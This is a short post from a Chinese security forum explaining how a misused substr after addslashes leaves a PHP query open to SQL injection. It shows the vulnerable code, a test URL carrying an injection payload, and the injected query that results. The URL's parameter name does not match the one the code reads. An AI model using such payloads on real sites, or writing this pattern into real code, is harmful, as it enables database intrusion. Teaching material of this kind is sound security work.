找回密码
 立即注册

扫一扫,访问微社区

QQ登录

只需一步,快速开始

搜索

关于substr的错误使用

nvhack 2017-8-19 19:48:07 显示全部楼层 阅读模式
  1. <?php
  2. $name = substr(addslashes($_GET['name']),1);
  3. $sql = "select * from users where username = '$name' limit 1";
  4. echo $sql;
  5. ?>
复制代码
浏览器访问:http://localhost/magic_quotes_gpc.php?order_sn=' and 2*3=6  -- +
程序返回
  1. select * from users where username = '' and 2*3=6 -- ' limit 1
复制代码

即可构造注入
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

  • 0 关注
  • 2 粉丝
  • 136 帖子